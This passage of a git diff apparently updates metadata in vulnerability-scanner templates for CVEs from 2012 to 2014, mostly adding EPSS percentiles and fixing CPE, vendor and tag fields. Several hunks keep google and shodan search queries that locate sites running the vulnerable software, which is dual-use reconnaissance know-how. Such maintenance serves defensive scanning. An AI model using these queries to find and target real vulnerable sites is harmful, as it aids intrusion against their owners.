epss-score: 0.02262
cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:*
+ epss-percentile: 0.88176
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/count-per-day"
diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml
index 9747022681..203a226d6b 100644
--- a/http/cves/2012/CVE-2012-0901.yaml
+++ b/http/cves/2012/CVE-2012-0901.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00216
cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.58864
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin"
diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml
index 0402f52eb2..ffaf75fc0c 100644
--- a/http/cves/2012/CVE-2012-0981.yaml
+++ b/http/cves/2012/CVE-2012-0981.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.05654
cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.92327
metadata:
max-request: 1
vendor: kybernetika
diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml
index 62c4c0e92d..c35c81dd3b 100644
--- a/http/cves/2012/CVE-2012-0991.yaml
+++ b/http/cves/2012/CVE-2012-0991.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.89208
cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.98307
metadata:
max-request: 1
vendor: openemr
diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml
index 9a6a2f5af4..10eafa9935 100644
--- a/http/cves/2012/CVE-2012-0996.yaml
+++ b/http/cves/2012/CVE-2012-0996.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01398
cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:*
+ epss-percentile: 0.84741
metadata:
max-request: 1
vendor: 11in1
diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml
index 34f2e69e0d..022ce152a6 100644
--- a/http/cves/2012/CVE-2012-1226.yaml
+++ b/http/cves/2012/CVE-2012-1226.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.10469
cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:*
+ epss-percentile: 0.94257
metadata:
max-request: 1
vendor: dolibarr
diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml
index 2ca989ea68..366fd1e660 100644
--- a/http/cves/2012/CVE-2012-1823.yaml
+++ b/http/cves/2012/CVE-2012-1823.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-20
epss-score: 0.97494
cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99959
metadata:
max-request: 1
vendor: php
diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml
index c1e5c44ee1..79d88e86ef 100644
--- a/http/cves/2012/CVE-2012-1835.yaml
+++ b/http/cves/2012/CVE-2012-1835.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00229
cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:*
+ epss-percentile: 0.60385
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml
index 1d00465bd2..87c3abcf98 100644
--- a/http/cves/2012/CVE-2012-2371.yaml
+++ b/http/cves/2012/CVE-2012-2371.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00857
cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.80154
metadata:
max-request: 1
vendor: mnt-tech
diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml
index 83f8ba0f8b..6075690e9f 100644
--- a/http/cves/2012/CVE-2012-3153.yaml
+++ b/http/cves/2012/CVE-2012-3153.yaml
@@ -21,6 +21,7 @@ info:
cwe-id: NVD-CWE-noinfo
epss-score: 0.97048
cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99647
metadata:
max-request: 2
vendor: oracle
diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml
index 616b15c1de..c83fe0b501 100644
--- a/http/cves/2012/CVE-2012-4032.yaml
+++ b/http/cves/2012/CVE-2012-4032.yaml
@@ -11,16 +11,21 @@ info:
- https://www.exploit-db.com/exploits/37488
- https://packetstormsecurity.com/files/114541/WebsitePanel-CMS-Open-Redirect.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/76803
+ - http://websitepanel.codeplex.com/workitem/224
classification:
- cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
cvss-score: 5.8
cve-id: CVE-2012-4032
cwe-id: CWE-20
+ epss-score: 0.01204
cpe: cpe:2.3:a:websitepanel:websitepanel:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83485
metadata:
max-request: 1
shodan-query: title:"WebsitePanel" html:"login"
- tags: cve,cve2012,redirect,websitepanel,authenticated
+ vendor: websitepanel
+ product: websitepanel
+ tags: packetstorm,cve,cve2012,redirect,websitepanel,authenticated
http:
- raw:
diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml
index ca55067da3..c4e0b54e32 100644
--- a/http/cves/2012/CVE-2012-4242.yaml
+++ b/http/cves/2012/CVE-2012-4242.yaml
@@ -14,10 +14,11 @@ info:
cve-id: CVE-2012-4242
cwe-id: CWE-79
epss-score: 0.00216
- cpe: cpe:2.3:a:matthew_fries:mf_gig_calendar:0.9.2:*:*:*:*:*:*:*
+ cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:*
+ epss-percentile: 0.5888
metadata:
max-request: 1
- vendor: matthew_fries
+ vendor: mf_gig_calendar_project
product: mf_gig_calendar
tags: cve,cve2012,wordpress,xss,wp-plugin
diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml
index 008e4303f8..71994d47c9 100644
--- a/http/cves/2012/CVE-2012-4253.yaml
+++ b/http/cves/2012/CVE-2012-4253.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.03411
cpe: cpe:2.3:a:mysqldumper:mysqldumper:1.24.4:*:*:*:*:*:*:*
+ epss-percentile: 0.9021
metadata:
max-request: 1
vendor: mysqldumper
diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml
index a8d9e9377e..80b3342b2c 100644
--- a/http/cves/2012/CVE-2012-4273.yaml
+++ b/http/cves/2012/CVE-2012-4273.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00252
cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:*
+ epss-percentile: 0.62364
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml
index 2fcc5dfd37..f5def3fab2 100644
--- a/http/cves/2012/CVE-2012-4547.yaml
+++ b/http/cves/2012/CVE-2012-4547.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0023
cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:*
+ epss-percentile: 0.60499
metadata:
max-request: 2
vendor: laurent_destailleur
diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml
index b42ca9feec..76c094dcf5 100644
--- a/http/cves/2012/CVE-2012-4768.yaml
+++ b/http/cves/2012/CVE-2012-4768.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00922
cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.80933
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml
index 792e7901f4..8135e487dd 100644
--- a/http/cves/2012/CVE-2012-4878.yaml
+++ b/http/cves/2012/CVE-2012-4878.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01193
cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:*
+ epss-percentile: 0.83395
metadata:
max-request: 1
vendor: flatnux
diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml
index 90f92a0122..4aed02c5fb 100644
--- a/http/cves/2012/CVE-2012-4889.yaml
+++ b/http/cves/2012/CVE-2012-4889.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.02518
cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:*
+ epss-percentile: 0.88764
metadata:
max-request: 1
vendor: manageengine
diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml
index 10c26ba029..ef6c9bd8c0 100644
--- a/http/cves/2012/CVE-2012-4940.yaml
+++ b/http/cves/2012/CVE-2012-4940.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.4
cve-id: CVE-2012-4940
cwe-id: CWE-22
- epss-score: 0.06126
+ epss-score: 0.05321
cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:*
+ epss-percentile: 0.92093
metadata:
max-request: 2
vendor: gecad
diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml
index 93039811cc..7b31d4cacd 100644
--- a/http/cves/2012/CVE-2012-4982.yaml
+++ b/http/cves/2012/CVE-2012-4982.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-20
epss-score: 0.00748
cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:*
+ epss-percentile: 0.78628
metadata:
max-request: 1
vendor: forescout
diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml
index f7419978b7..716bbd085d 100644
--- a/http/cves/2012/CVE-2012-5321.yaml
+++ b/http/cves/2012/CVE-2012-5321.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-20
epss-score: 0.02634
cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:*
+ epss-percentile: 0.88997
metadata:
max-request: 1
shodan-query: http.html:"tiki wiki"
diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml
index d40387d9be..7038a6011c 100644
--- a/http/cves/2012/CVE-2012-5913.yaml
+++ b/http/cves/2012/CVE-2012-5913.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2012-5913
cwe-id: CWE-79
- epss-score: 0.0029
+ epss-score: 0.00828
cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:*
+ epss-percentile: 0.79806
metadata:
max-request: 1
vendor: wordpress_integrator_project
diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml
index 8a20e43727..c63c685d5f 100644
--- a/http/cves/2012/CVE-2012-6499.yaml
+++ b/http/cves/2012/CVE-2012-6499.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.8
cve-id: CVE-2012-6499
cwe-id: CWE-20
- epss-score: 0.01336
+ epss-score: 0.01204
cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83485
metadata:
max-request: 1
vendor: age_verification_project
diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml
index f76fea5b8b..5015946992 100644
--- a/http/cves/2013/CVE-2013-1965.yaml
+++ b/http/cves/2013/CVE-2013-1965.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-94
epss-score: 0.00813
cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:*
+ epss-percentile: 0.79616
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml
index fd62f0d0f6..b0dcaec8c7 100644
--- a/http/cves/2013/CVE-2013-2248.yaml
+++ b/http/cves/2013/CVE-2013-2248.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.8
cve-id: CVE-2013-2248
cwe-id: CWE-20
- epss-score: 0.97324
+ epss-score: 0.9734
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99824
metadata:
max-request: 1
vendor: apache
diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml
index 6101561478..27e13af909 100644
--- a/http/cves/2013/CVE-2013-2251.yaml
+++ b/http/cves/2013/CVE-2013-2251.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-20
epss-score: 0.97432
cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99902
metadata:
max-request: 9
vendor: apache
diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml
index c7259eb354..de0a837c13 100644
--- a/http/cves/2013/CVE-2013-2287.yaml
+++ b/http/cves/2013/CVE-2013-2287.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00219
cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:*
+ epss-percentile: 0.59185
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/uploader"
diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml
index 03c32b67aa..16efbdf359 100644
--- a/http/cves/2013/CVE-2013-2621.yaml
+++ b/http/cves/2013/CVE-2013-2621.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2013-2621
cwe-id: CWE-601
- epss-score: 0.03238
+ epss-score: 0.03568
cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:*
+ epss-percentile: 0.90403
metadata:
max-request: 2
vendor: telaen_project
diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml
index b0939b8c2e..8594a53846 100644
--- a/http/cves/2013/CVE-2013-3526.yaml
+++ b/http/cves/2013/CVE-2013-3526.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00431
cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.71323
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/trafficanalyzer"
diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml
index cd199f9b77..4b36a59032 100644
--- a/http/cves/2013/CVE-2013-3827.yaml
+++ b/http/cves/2013/CVE-2013-3827.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5
cve-id: CVE-2013-3827
cwe-id: NVD-CWE-noinfo
- epss-score: 0.1225
+ epss-score: 0.73399
cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
+ epss-percentile: 0.97675
metadata:
max-request: 10
vendor: oracle
diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml
index 163112e734..9f32bd4447 100644
--- a/http/cves/2013/CVE-2013-4117.yaml
+++ b/http/cves/2013/CVE-2013-4117.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.01217
cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:*
+ epss-percentile: 0.83576
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml
index 4ebcddd057..5a18c62b6f 100644
--- a/http/cves/2013/CVE-2013-4625.yaml
+++ b/http/cves/2013/CVE-2013-4625.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2013-4625
cwe-id: CWE-79
- epss-score: 0.01062
+ epss-score: 0.01217
cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83576
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/duplicator"
diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml
index bec4181ac9..2595feecb3 100644
--- a/http/cves/2013/CVE-2013-5528.yaml
+++ b/http/cves/2013/CVE-2013-5528.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00442
cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71682
metadata:
max-request: 1
vendor: cisco
diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml
index 76c2b6ae72..288a73aac7 100644
--- a/http/cves/2013/CVE-2013-5979.yaml
+++ b/http/cves/2013/CVE-2013-5979.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5
cve-id: CVE-2013-5979
cwe-id: CWE-22
- epss-score: 0.07589
+ epss-score: 0.06969
cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.93073
metadata:
max-request: 1
vendor: springsignage
diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml
index 1630af6d2e..09e8d32f80 100644
--- a/http/cves/2013/CVE-2013-6281.yaml
+++ b/http/cves/2013/CVE-2013-6281.yaml
@@ -8,7 +8,6 @@ info:
WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.
reference:
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
- - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/
- https://wordpress.org/plugins/dhtmlxspreadsheet/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
- https://nvd.nist.gov/vuln/detail/CVE-2013-6281
@@ -19,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00209
cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:*
+ epss-percentile: 0.5816
metadata:
max-request: 1
google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml
index 05d42a4de2..736dca7dc7 100644
--- a/http/cves/2013/CVE-2013-7091.yaml
+++ b/http/cves/2013/CVE-2013-7091.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97375
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99856
metadata:
max-request: 2
vendor: synacor
diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml
index ddcf90e79c..63e153acaa 100644
--- a/http/cves/2013/CVE-2013-7240.yaml
+++ b/http/cves/2013/CVE-2013-7240.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.19842
cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:*
+ epss-percentile: 0.95661
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/advanced-dewplayer/"
diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml
index 010ecc9527..abe35b68fc 100644
--- a/http/cves/2013/CVE-2013-7285.yaml
+++ b/http/cves/2013/CVE-2013-7285.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-78
epss-score: 0.33561
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96488
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml
index 99aebf0b90..4f8ebc2918 100644
--- a/http/cves/2014/CVE-2014-10037.yaml
+++ b/http/cves/2014/CVE-2014-10037.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2014-10037
cwe-id: CWE-22
- epss-score: 0.22143
+ epss-score: 0.18676
cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:*
+ epss-percentile: 0.95552
metadata:
max-request: 1
vendor: domphp
diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml
index df2b61659a..0d81f6f722 100644
--- a/http/cves/2014/CVE-2014-1203.yaml
+++ b/http/cves/2014/CVE-2014-1203.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-77
epss-score: 0.02045
cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87539
metadata:
max-request: 1
vendor: eyou
diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml
index 3225be3f89..c1d3aaa31d 100644
--- a/http/cves/2014/CVE-2014-2321.yaml
+++ b/http/cves/2014/CVE-2014-2321.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-264
epss-score: 0.96364
cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:*
+ epss-percentile: 0.99354
metadata:
max-request: 1
vendor: zte
diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml
index 1c6d087629..f18961ea83 100644
--- a/http/cves/2014/CVE-2014-2323.yaml
+++ b/http/cves/2014/CVE-2014-2323.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.96912
cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99594
metadata:
max-request: 1
vendor: lighttpd
diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml
index d01b7cc8fd..e4b9f8e694 100644
--- a/http/cves/2014/CVE-2014-2383.yaml
+++ b/http/cves/2014/CVE-2014-2383.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-200
epss-score: 0.00723
cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:*
+ epss-percentile: 0.78237
metadata:
max-request: 11
verified: true
diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml
index 255676e3d2..ab1bdf4d22 100644
--- a/http/cves/2014/CVE-2014-2908.yaml
+++ b/http/cves/2014/CVE-2014-2908.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00594
cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.75612
metadata:
max-request: 1
vendor: siemens
diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml
index 3038091383..3dcf210193 100644
--- a/http/cves/2014/CVE-2014-2962.yaml
+++ b/http/cves/2014/CVE-2014-2962.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.95825
cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99198
metadata:
max-request: 1
vendor: belkin
diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml
index a44cb5d98e..f305011e39 100644
--- a/http/cves/2014/CVE-2014-3120.yaml
+++ b/http/cves/2014/CVE-2014-3120.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.8
cve-id: CVE-2014-3120
cwe-id: CWE-284
- epss-score: 0.58403
+ epss-score: 0.55248
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97201
metadata:
max-request: 1
vendor: elasticsearch
diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml
index 3e8d8748a8..9359e064eb 100644
--- a/http/cves/2014/CVE-2014-3206.yaml
+++ b/http/cves/2014/CVE-2014-3206.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2014-3206
cwe-id: CWE-20
- epss-score: 0.54403
+ epss-score: 0.54379
cpe: cpe:2.3:o:seagate:blackarmor_nas_220_firmware:-:*:*:*:*:*:*:*
+ epss-percentile: 0.9718
metadata:
max-request: 2
vendor: seagate
diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml
index 3f91d4084b..6b9ecad336 100644
--- a/http/cves/2014/CVE-2014-3704.yaml
+++ b/http/cves/2014/CVE-2014-3704.yaml
@@ -21,6 +21,7 @@ info:
cwe-id: CWE-89
epss-score: 0.97529
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99982
metadata:
max-request: 1
shodan-query: http.component:"drupal"
diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml
index de71d819bb..dc4864b55f 100644
--- a/http/cves/2014/CVE-2014-3744.yaml
+++ b/http/cves/2014/CVE-2014-3744.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00672
cpe: cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77222
metadata:
max-request: 1
vendor: nodejs
diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml
index e8dd39dede..13117da1e6 100644
--- a/http/cves/2014/CVE-2014-4210.yaml
+++ b/http/cves/2014/CVE-2014-4210.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: NVD-CWE-noinfo
epss-score: 0.96955
cpe: cpe:2.3:a:oracle:fusion_middleware:10.0.2:*:*:*:*:*:*:*
+ epss-percentile: 0.99613
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml
index fea1ded33b..250e6a7d11 100644
--- a/http/cves/2014/CVE-2014-4513.yaml
+++ b/http/cves/2014/CVE-2014-4513.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00145
cpe: cpe:2.3:a:activehelper:activehelper_livehelp_live_chat:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49694
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml
index 7949471a6e..b7e712c7e9 100644
--- a/http/cves/2014/CVE-2014-4535.yaml
+++ b/http/cves/2014/CVE-2014-4535.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47998
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml
index 73319e63ff..9e3829c22f 100644
--- a/http/cves/2014/CVE-2014-4536.yaml
+++ b/http/cves/2014/CVE-2014-4536.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00149
cpe: cpe:2.3:a:katz:infusionsoft_gravity_forms:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.50284
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml
index df1c8f6d24..473d56007d 100644
--- a/http/cves/2014/CVE-2014-4539.yaml
+++ b/http/cves/2014/CVE-2014-4539.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00135
cpe: cpe:2.3:a:movies_project:movies:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.47998
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml
index 726abc9a94..0f3405a8a9 100644
--- a/http/cves/2014/CVE-2014-4544.yaml
+++ b/http/cves/2014/CVE-2014-4544.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00118
cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45006
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml
index 9483e844c5..56f0d0c017 100644
